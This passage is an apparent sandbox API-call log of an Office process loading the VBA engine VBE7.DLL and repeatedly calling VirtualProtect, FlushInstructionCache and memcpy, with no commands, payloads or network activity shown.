dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.746] GetCurrentProcess () returned 0xffffffff [0100.746] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0100.746] SetErrorMode (uMode=0x8001) returned 0x8001 [0100.746] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0100.746] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x69130000 [0100.747] SetErrorMode (uMode=0x8001) returned 0x8001 [0100.747] GetProcAddress (hModule=0x69130000, lpProcName=0x2cb) returned 0x693004b4 [0100.748] GetAsyncKeyState (vKey=3) returned 0 [0100.749] CRetailMalloc_Alloc () returned 0xc9d0250 [0100.749] memcpy (in: _Dst=0xcb65188, _Src=0x19779c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.749] memcpy (in: _Dst=0xc9d0270, _Src=0x197804, _Size=0x18 | out: _Dst=0xc9d0270) returned 0xc9d0270 [0100.749] CRetailMalloc_Realloc () returned 0xc9d0250 [0100.749] CRetailMalloc_Free () returned 0x1 [0100.749] GetCurrentProcess () returned 0xffffffff [0100.749] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0100.749] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.749] GetCurrentProcess () returned 0xffffffff [0100.749] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0100.749] GetCurrentProcess () returned 0xffffffff [0100.749] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0100.749] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.750] GetCurrentProcess () returned 0xffffffff [0100.750] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0100.750] GetCurrentProcess () returned 0xffffffff [0100.750] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0100.750] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.750] GetCurrentProcess () returned 0xffffffff [0100.750] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0100.750] GetCurrentProcess () returned 0xffffffff [0100.750] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0100.751] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.752] GetCurrentProcess () returned 0xffffffff [0100.752] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0100.752] GetCurrentProcess () returned 0xffffffff [0100.752] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0100.752] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.752] GetCurrentProcess () returned 0xffffffff [0100.752] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0100.752] GetCurrentProcess () returned 0xffffffff [0100.752] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0100.752] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.753] GetCurrentProcess () returned 0xffffffff [0100.753] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0100.753] GetCurrentProcess () returned 0xffffffff [0100.753] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0100.753] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.754] GetCurrentProcess () returned 0xffffffff [0100.754] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0100.754] GetCurrentProcess () returned 0xffffffff [0100.754] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0100.754] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.755] GetCurrentProcess () returned 0xffffffff [0100.755] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0100.755] GetCurrentProcess () returned 0xffffffff [0100.755] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0100.755] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.755] GetCurrentProcess () returned 0xffffffff [0100.755] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0100.755] GetCurrentProcess () returned 0xffffffff [0100.755] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0100.756] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.756] GetCurrentProcess () returned 0xffffffff [0100.756] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0100.756] GetCurrentProcess () returned 0xffffffff [0100.756] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0100.756] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.757] GetCurrentProcess () returned 0xffffffff [0100.757] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0100.757] GetCurrentProcess () returned 0xffffffff [0100.757] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0100.757] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.758] GetCurrentProcess () returned 0xffffffff [0100.758] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0100.758] GetCurrentProcess () returned 0xffffffff [0100.758] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0100.758] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.758] GetCurrentProcess () returned 0xffffffff [0100.758] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0100.758] GetCurrentProcess () returned 0xffffffff [0100.758] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0100.758] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.759] GetCurrentProcess () returned 0xffffffff [0100.759] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0100.759] GetCurrentProcess () returned 0xffffffff [0100.759] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0100.759] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.760] GetCurrentProcess () returned 0xffffffff [0100.760] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0100.760] GetCurrentProcess () returned 0xffffffff [0100.760] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0100.760] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.761] GetCurrentProcess () returned 0xffffffff [0100.761] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0100.761] GetCurrentProcess () returned 0xffffffff [0100.761] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0100.761] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.761] GetCurrentProcess () returned 0xffffffff [0100.761] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0100.761] GetCurrentProcess () returned 0xffffffff [0100.761] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0100.762] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.762] GetCurrentProcess () returned 0xffffffff [0100.762] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0100.762] GetCurrentProcess () returned 0xffffffff [0100.762] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0100.762] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.763] GetCurrentProcess () returned 0xffffffff [0100.763] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0100.763] GetCurrentProcess () returned 0xffffffff [0100.763] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0100.763] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.764] GetCurrentProcess () returned 0xffffffff [0100.764] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0100.764] GetCurrentProcess () returned 0xffffffff [0100.764] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0100.764] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.765] GetCurrentProcess () returned 0xffffffff [0100.765] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0100.765] GetCurrentProcess () returned 0xffffffff [0100.765] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0100.765] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.765] GetCurrentProcess () returned 0xffffffff [0100.765] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0100.765] GetCurrentProcess () returned 0xffffffff [0100.765] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0100.765] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.766] GetCurrentProcess () returned 0xffffffff [0100.766] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0100.766] GetCurrentProcess () returned 0xffffffff [0100.766] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0100.766] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.815] GetCurrentProcess () returned 0xffffffff [0100.815] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0100.815] GetCurrentProcess () returned 0xffffffff [0100.815] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0100.815] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.816] GetCurrentProcess () returned 0xffffffff [0100.816] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0100.816] GetCurrentProcess () returned 0xffffffff [0100.816] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0100.816] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.817] GetCurrentProcess () returned 0xffffffff [0100.817] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0100.817] GetCurrentProcess () returned 0xffffffff [0100.817] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0100.817] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.818] GetCurrentProcess () returned 0xffffffff [0100.818] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0100.818] GetCurrentProcess () returned 0xffffffff [0100.819] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0100.819] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.819] GetCurrentProcess () returned 0xffffffff [0100.819] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0100.819] GetCurrentProcess () returned 0xffffffff [0100.819] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0100.819] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.820] GetCurrentProcess () returned 0xffffffff [0100.820] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0100.820] GetCurrentProcess () returned 0xffffffff [0100.820] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0100.820] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.821] GetCurrentProcess () returned 0xffffffff [0100.821] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0100.821] GetCurrentProcess () returned 0xffffffff [0100.821] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0100.821] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0100.822] GetCurrentProcess () returned 0xffffffff [0100.822] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0100.823] GetAsyncKeyState (vKey=3) returned 0 [0100.823] CRetailMalloc_Alloc () returned 0xc9d02b0 [0100.823] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.823] memcpy (in: _Dst=0xcb65290, _Src=0x197748, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.824] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.824] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.824] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.824] memcpy (in: _Dst=0xcb6518c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.824] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.824] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.824] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.824] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.824] memcpy (in: _Dst=0xcb6518c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.825] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.825] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.825] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.825] memcpy (in: _Dst=0xcb65188, _Src=0x19777c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.825] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.826] CRetailMalloc_Realloc () returned 0xb3d1d30 [0100.826] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.826] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.826] memcpy (in: _Dst=0xcb65188, _Src=0x19777c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.826] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.826] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.826] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.826] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.826] memcpy (in: _Dst=0xcb6518c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.827] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.827] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.827] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.827] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.827] memcpy (in: _Dst=0xcb6518c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.827] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.828] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.828] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.828] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.828] memcpy (in: _Dst=0xcb6518c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.828] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.828] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.829] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.829] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.829] memcpy (in: _Dst=0xcb6518c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.829] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.830] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.830] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.830] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.830] memcpy (in: _Dst=0xcb6518c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.830] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.830] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.831] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.831] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.831] memcpy (in: _Dst=0xcb6518c, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.831] memcpy (in: _Dst=0xcb65190, _Src=0x19777c, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0100.831] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.831] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.831] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.831] memcpy (in: _Dst=0xcb65188, _Src=0x19777c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.832] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.832] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.832] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.832] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.832] memcpy (in: _Dst=0xcb6518c, _Src=0x19777c, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.832] memcpy (in: _Dst=0xcb65188, _Src=0x197748, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.836] CRetailMalloc_Alloc () returned 0xc790f90 [0100.836] memcpy (in: _Dst=0xc790f90, _Src=0x0, _Size=0x0 | out: _Dst=0xc790f90) returned 0xc790f90 [0100.836] memcpy (in: _Dst=0xc9d054c, _Src=0x1977e4, _Size=0x18 | out: _Dst=0xc9d054c) returned 0xc9d054c [0100.836] memcpy (in: _Dst=0xc9d058e, _Src=0xc790f90, _Size=0x2 | out: _Dst=0xc9d058e) returned 0xc9d058e [0100.836] CRetailMalloc_Realloc () returned 0xc9d02b0 [0100.836] CRetailMalloc_Free () returned 0x1 [0100.836] CRetailMalloc_Free () returned 0x1 [0100.836] GetCurrentProcess () returned 0xffffffff [0100.836] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0100.836] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.837] GetCurrentProcess () returned 0xffffffff [0100.837] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0100.837] GetCurrentProcess () returned 0xffffffff [0100.837] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0100.837] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.838] GetCurrentProcess () returned 0xffffffff [0100.838] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0100.838] GetCurrentProcess () returned 0xffffffff [0100.838] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0100.838] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.839] GetCurrentProcess () returned 0xffffffff [0100.839] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0100.839] GetCurrentProcess () returned 0xffffffff [0100.839] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0100.839] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.840] GetCurrentProcess () returned 0xffffffff [0100.840] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0100.840] GetCurrentProcess () returned 0xffffffff [0100.840] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0100.840] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.841] GetCurrentProcess () returned 0xffffffff [0100.841] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0100.841] GetCurrentProcess () returned 0xffffffff [0100.841] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0100.841] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.841] GetCurrentProcess () returned 0xffffffff [0100.842] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0100.842] GetCurrentProcess () returned 0xffffffff [0100.842] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0100.842] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0100.842] GetCurrentProcess () returned 0xffffffff [0100.842] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0100.842] 